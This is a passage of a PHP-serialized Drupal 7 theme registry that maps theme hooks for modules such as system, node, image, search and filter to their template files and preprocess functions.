path\";s:15:\"modules/toolbar\";s:8:\"function\";s:20:\"theme_toolbar_toggle\";}s:30:\"taxonomy_overview_vocabularies\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/taxonomy\";s:8:\"function\";s:36:\"theme_taxonomy_overview_vocabularies\";}s:23:\"taxonomy_overview_terms\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/taxonomy\";s:8:\"function\";s:29:\"theme_taxonomy_overview_terms\";}s:13:\"taxonomy_term\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:30:\"modules/taxonomy/taxonomy-term\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/taxonomy\";s:20:\"preprocess functions\";a:4:{i:0;s:19:\"template_preprocess\";i:1;s:33:\"template_preprocess_taxonomy_term\";i:2;s:21:\"contextual_preprocess\";i:3;s:28:\"rdf_preprocess_taxonomy_term\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:4:\"html\";a:6:{s:14:\"render element\";s:4:\"page\";s:8:\"template\";s:19:\"modules/system/html\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"themes/bartik\";s:20:\"preprocess functions\";a:6:{i:0;s:19:\"template_preprocess\";i:1;s:24:\"template_preprocess_html\";i:2;s:21:\"contextual_preprocess\";i:3;s:23:\"overlay_preprocess_html\";i:4;s:23:\"toolbar_preprocess_html\";i:5;s:22:\"bartik_preprocess_html\";}s:17:\"process functions\";a:4:{i:0;s:16:\"template_process\";i:1;s:21:\"template_process_html\";i:2;s:11:\"rdf_process\";i:3;s:19:\"bartik_process_html\";}}s:6:\"region\";a:6:{s:14:\"render element\";s:8:\"elements\";s:8:\"template\";s:21:\"modules/system/region\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:26:\"template_preprocess_region\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:15:\"status_messages\";a:4:{s:9:\"variables\";a:1:{s:7:\"display\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_status_messages\";}s:4:\"link\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:4:\"path\";N;s:7:\"options\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_link\";}s:5:\"links\";a:4:{s:9:\"variables\";a:3:{s:5:\"links\";N;s:10:\"attributes\";a:1:{s:5:\"class\";a:1:{i:0;s:5:\"links\";}}s:7:\"heading\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_links\";}s:5:\"image\";a:5:{s:9:\"variables\";a:6:{s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_image\";s:20:\"preprocess functions\";a:1:{i:0;s:20:\"rdf_preprocess_image\";}}s:10:\"breadcrumb\";a:4:{s:9:\"variables\";a:1:{s:10:\"breadcrumb\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_breadcrumb\";}s:4:\"help\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_help\";}s:5:\"table\";a:4:{s:9:\"variables\";a:7:{s:6:\"header\";N;s:4:\"rows\";N;s:10:\"attributes\";a:0:{}s:7:\"caption\";N;s:9:\"colgroups\";a:0:{}s:6:\"sticky\";b:1;s:5:\"empty\";s:0:\"\";}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_table\";}s:19:\"tablesort_indicator\";a:4:{s:9:\"variables\";a:1:{s:5:\"style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_tablesort_indicator\";}s:4:\"mark\";a:4:{s:9:\"variables\";a:1:{s:4:\"type\";i:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_mark\";}s:9:\"item_list\";a:4:{s:9:\"variables\";a:4:{s:5:\"items\";a:0:{}s:5:\"title\";N;s:4:\"type\";s:2:\"ul\";s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_item_list\";}s:14:\"more_help_link\";a:4:{s:9:\"variables\";a:1:{s:3:\"url\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:20:\"theme_more_help_link\";}s:9:\"feed_icon\";a:4:{s:9:\"variables\";a:2:{s:3:\"url\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_feed_icon\";}s:9:\"more_link\";a:4:{s:9:\"variables\";a:2:{s:3:\"url\";N;s:5:\"title\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_more_link\";}s:8:\"username\";a:6:{s:9:\"variables\";a:1:{s:7:\"account\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_username\";s:20:\"preprocess functions\";a:2:{i:0;s:28:\"template_preprocess_username\";i:1;s:23:\"rdf_preprocess_username\";}s:17:\"process functions\";a:1:{i:0;s:25:\"template_process_username\";}}s:12:\"progress_bar\";a:4:{s:9:\"variables\";a:2:{s:7:\"percent\";N;s:7:\"message\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_progress_bar\";}s:11:\"indentation\";a:4:{s:9:\"variables\";a:1:{s:4:\"size\";i:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_indentation\";}s:8:\"html_tag\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_html_tag\";}s:11:\"update_page\";a:4:{s:9:\"variables\";a:2:{s:7:\"content\";N;s:13:\"show_messages\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_update_page\";}s:12:\"install_page\";a:4:{s:9:\"variables\";a:1:{s:7:\"content\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_install_page\";}s:9:\"task_list\";a:4:{s:9:\"variables\";a:2:{s:5:\"items\";N;s:6:\"active\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_task_list\";}s:17:\"authorize_message\";a:4:{s:9:\"variables\";a:2:{s:7:\"message\";N;s:7:\"success\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_authorize_message\";}s:16:\"authorize_report\";a:4:{s:9:\"variables\";a:1:{s:8:\"messages\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:22:\"theme_authorize_report\";}s:5:\"pager\";a:4:{s:9:\"variables\";a:4:{s:4:\"tags\";a:0:{}s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}s:8:\"quantity\";i:9;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_pager\";}s:11:\"pager_first\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_pager_first\";}s:14:\"pager_previous\";a:4:{s:9:\"variables\";a:4:{s:4:\"text\";N;s:7:\"element\";i:0;s:8:\"interval\";i:1;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:20:\"theme_pager_previous\";}s:10:\"pager_next\";a:4:{s:9:\"variables\";a:4:{s:4:\"text\";N;s:7:\"element\";i:0;s:8:\"interval\";i:1;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_next\";}s:10:\"pager_last\";a:4:{s:9:\"variables\";a:3:{s:4:\"text\";N;s:7:\"element\";i:0;s:10:\"parameters\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_last\";}s:10:\"pager_link\";a:4:{s:9:\"variables\";a:5:{s:4:\"text\";N;s:8:\"page_new\";N;s:7:\"element\";N;s:10:\"parameters\";a:0:{}s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_pager_link\";}s:9:\"menu_link\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_menu_link\";}s:15:\"menu_local_task\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_menu_local_task\";}s:17:\"menu_local_action\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_menu_local_action\";}s:16:\"menu_local_tasks\";a:4:{s:9:\"variables\";a:2:{s:7:\"primary\";a:0:{}s:9:\"secondary\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:22:\"theme_menu_local_tasks\";}s:6:\"select\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_select\";}s:8:\"fieldset\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_fieldset\";}s:5:\"radio\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:11:\"theme_radio\";}s:6:\"radios\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_radios\";}s:4:\"date\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_date\";}s:15:\"exposed_filters\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:21:\"theme_exposed_filters\";}s:8:\"checkbox\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_checkbox\";}s:10:\"checkboxes\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_checkboxes\";}s:6:\"button\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_button\";}s:12:\"image_button\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_image_button\";}s:6:\"hidden\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:12:\"theme_hidden\";}s:9:\"textfield\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_textfield\";}s:4:\"form\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_form\";}s:8:\"textarea\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_textarea\";}s:8:\"password\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:14:\"theme_password\";}s:4:\"file\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:10:\"theme_file\";}s:11:\"tableselect\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_tableselect\";}s:12:\"form_element\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_form_element\";}s:20:\"form_required_marker\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:26:\"theme_form_required_marker\";}s:18:\"form_element_label\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_form_element_label\";}s:13:\"vertical_tabs\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:19:\"theme_vertical_tabs\";}s:9:\"container\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:15:\"theme_container\";}s:18:\"system_themes_page\";a:6:{s:9:\"variables\";a:1:{s:12:\"theme_groups\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_system_themes_page\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:20:\"system_settings_form\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:26:\"theme_system_settings_form\";}s:12:\"confirm_form\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:18:\"theme_confirm_form\";}s:23:\"system_modules_fieldset\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:29:\"theme_system_modules_fieldset\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:27:\"system_modules_incompatible\";a:6:{s:9:\"variables\";a:1:{s:7:\"message\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:33:\"theme_system_modules_incompatible\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:24:\"system_modules_uninstall\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:30:\"theme_system_modules_uninstall\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:13:\"status_report\";a:6:{s:14:\"render element\";s:12:\"requirements\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:19:\"theme_status_report\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:10:\"admin_page\";a:6:{s:9:\"variables\";a:1:{s:6:\"blocks\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:16:\"theme_admin_page\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:11:\"admin_block\";a:6:{s:9:\"variables\";a:1:{s:5:\"block\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:17:\"theme_admin_block\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:19:\"admin_block_content\";a:6:{s:9:\"variables\";a:1:{s:7:\"content\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_admin_block_content\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:18:\"system_admin_index\";a:6:{s:9:\"variables\";a:1:{s:10:\"menu_items\";N;}s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:24:\"theme_system_admin_index\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:17:\"system_powered_by\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:23:\"theme_system_powered_by\";}s:19:\"system_compact_link\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:25:\"theme_system_compact_link\";}s:25:\"system_date_time_settings\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"system.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/system\";s:8:\"function\";s:31:\"theme_system_date_time_settings\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/system/system.admin.inc\";}}s:22:\"shortcut_set_customize\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:18:\"shortcut.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:16:\"modules/shortcut\";s:8:\"function\";s:28:\"theme_shortcut_set_customize\";s:8:\"includes\";a:1:{i:0;s:35:\"modules/shortcut/shortcut.admin.inc\";}}s:17:\"search_block_form\";a:6:{s:14:\"render element\";s:4:\"form\";s:8:\"template\";s:32:\"modules/search/search-block-form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:37:\"template_preprocess_search_block_form\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:13:\"search_result\";a:8:{s:9:\"variables\";a:2:{s:6:\"result\";N;s:6:\"module\";N;}s:4:\"file\";s:16:\"search.pages.inc\";s:8:\"template\";s:28:\"modules/search/search-result\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/search/search.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:33:\"template_preprocess_search_result\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:14:\"search_results\";a:8:{s:9:\"variables\";a:2:{s:7:\"results\";N;s:6:\"module\";N;}s:4:\"file\";s:16:\"search.pages.inc\";s:8:\"template\";s:29:\"modules/search/search-results\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/search\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/search/search.pages.inc\";}s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:34:\"template_preprocess_search_results\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:2:{i:0;s:16:\"template_process\";i:1;s:11:\"rdf_process\";}}s:29:\"rdf_template_variable_wrapper\";a:4:{s:9:\"variables\";a:4:{s:7:\"content\";N;s:10:\"attributes\";a:0:{}s:7:\"context\";a:0:{}s:6:\"inline\";b:1;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:35:\"theme_rdf_template_variable_wrapper\";}s:12:\"rdf_metadata\";a:4:{s:9:\"variables\";a:1:{s:8:\"metadata\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:11:\"modules/rdf\";s:8:\"function\";s:18:\"theme_rdf_metadata\";}s:7:\"overlay\";a:6:{s:14:\"render element\";s:4:\"page\";s:8:\"template\";s:23:\"modules/overlay/overlay\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/overlay\";s:20:\"preprocess functions\";a:3:{i:0;s:19:\"template_preprocess\";i:1;s:27:\"template_preprocess_overlay\";i:2;s:21:\"contextual_preprocess\";}s:17:\"process functions\";a:3:{i:0;s:16:\"template_process\";i:1;s:24:\"template_process_overlay\";i:2;s:11:\"rdf_process\";}}s:23:\"overlay_disable_message\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:15:\"modules/overlay\";s:8:\"function\";s:29:\"theme_overlay_disable_message\";}s:12:\"options_none\";a:4:{s:9:\"variables\";a:2:{s:8:\"instance\";N;s:6:\"option\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:29:\"modules/field/modules/options\";s:8:\"function\";s:18:\"theme_options_none\";}s:17:\"node_search_admin\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:23:\"theme_node_search_admin\";}s:13:\"node_add_list\";a:6:{s:9:\"variables\";a:1:{s:7:\"content\";N;}s:4:\"file\";s:14:\"node.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:19:\"theme_node_add_list\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/node/node.pages.inc\";}}s:12:\"node_preview\";a:6:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"file\";s:14:\"node.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:18:\"theme_node_preview\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/node/node.pages.inc\";}}s:19:\"node_admin_overview\";a:6:{s:9:\"variables\";a:2:{s:4:\"name\";N;s:4:\"type\";N;}s:4:\"file\";s:17:\"content_types.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:25:\"theme_node_admin_overview\";s:8:\"includes\";a:1:{i:0;s:30:\"modules/node/content_types.inc\";}}s:17:\"node_recent_block\";a:4:{s:9:\"variables\";a:1:{s:5:\"nodes\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:23:\"theme_node_recent_block\";}s:19:\"node_recent_content\";a:4:{s:9:\"variables\";a:1:{s:4:\"node\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/node\";s:8:\"function\";s:25:\"theme_node_recent_content\";}s:18:\"menu_overview_form\";a:6:{s:4:\"file\";s:14:\"menu.admin.inc\";s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/menu\";s:8:\"function\";s:24:\"theme_menu_overview_form\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/menu/menu.admin.inc\";}}s:19:\"menu_admin_overview\";a:6:{s:4:\"file\";s:14:\"menu.admin.inc\";s:9:\"variables\";a:3:{s:5:\"title\";N;s:4:\"name\";N;s:11:\"description\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:12:\"modules/menu\";s:8:\"function\";s:25:\"theme_menu_admin_overview\";s:8:\"includes\";a:1:{i:0;s:27:\"modules/menu/menu.admin.inc\";}}s:11:\"image_style\";a:4:{s:9:\"variables\";a:7:{s:10:\"style_name\";N;s:4:\"path\";N;s:5:\"width\";N;s:6:\"height\";N;s:3:\"alt\";s:0:\"\";s:5:\"title\";N;s:10:\"attributes\";a:0:{}}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:17:\"theme_image_style\";}s:16:\"image_style_list\";a:4:{s:9:\"variables\";a:1:{s:6:\"styles\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:22:\"theme_image_style_list\";}s:19:\"image_style_effects\";a:4:{s:14:\"render element\";s:4:\"form\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_style_effects\";}s:19:\"image_style_preview\";a:4:{s:9:\"variables\";a:1:{s:5:\"style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_style_preview\";}s:12:\"image_anchor\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:18:\"theme_image_anchor\";}s:20:\"image_resize_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:26:\"theme_image_resize_summary\";}s:19:\"image_scale_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:25:\"theme_image_scale_summary\";}s:18:\"image_crop_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:24:\"theme_image_crop_summary\";}s:20:\"image_rotate_summary\";a:4:{s:9:\"variables\";a:1:{s:4:\"data\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:26:\"theme_image_rotate_summary\";}s:12:\"image_widget\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:18:\"theme_image_widget\";}s:15:\"image_formatter\";a:4:{s:9:\"variables\";a:3:{s:4:\"item\";N;s:4:\"path\";N;s:11:\"image_style\";N;}s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:13:\"modules/image\";s:8:\"function\";s:21:\"theme_image_formatter\";}s:21:\"filter_admin_overview\";a:6:{s:14:\"render element\";s:4:\"form\";s:4:\"file\";s:16:\"filter.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:27:\"theme_filter_admin_overview\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.admin.inc\";}}s:32:\"filter_admin_format_filter_order\";a:6:{s:14:\"render element\";s:7:\"element\";s:4:\"file\";s:16:\"filter.admin.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:38:\"theme_filter_admin_format_filter_order\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.admin.inc\";}}s:11:\"filter_tips\";a:6:{s:9:\"variables\";a:2:{s:4:\"tips\";N;s:4:\"long\";b:0;}s:4:\"file\";s:16:\"filter.pages.inc\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:17:\"theme_filter_tips\";s:8:\"includes\";a:1:{i:0;s:31:\"modules/filter/filter.pages.inc\";}}s:19:\"text_format_wrapper\";a:4:{s:14:\"render element\";s:7:\"element\";s:4:\"type\";s:6:\"module\";s:10:\"theme path\";s:14:\"modules/filter\";s:8:\"function\";s:25:\"theme_text_format_wrapper\";}s:21:\"filter_tips_more_info\";a:4:{s:9:\"variables\";a:0:{}s:4:\"type\";s:6:\"module\";s:10:\"theme 